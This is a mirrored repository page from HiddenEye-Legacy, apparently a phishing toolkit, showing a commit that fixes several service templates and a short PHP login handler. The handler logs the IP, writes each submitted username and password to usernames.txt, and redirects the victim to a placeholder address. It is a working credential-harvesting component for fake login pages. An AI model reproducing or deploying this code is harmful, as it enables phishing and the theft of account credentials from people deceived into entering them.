mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
2de87f7742
* Fix #448 * Fix #449 * Fix #416 and #431 * Added Xbox * Fix MySpace and ProtonMail * .gitignore file * Fix ip.txt
7 lines
186 B
PHP
7 lines
186 B
PHP
<?php
|
|
include 'ip.php';
|
|
|
|
file_put_contents("usernames.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
|
|
header('Location: <CUSTOM>');
|
|
exit();
|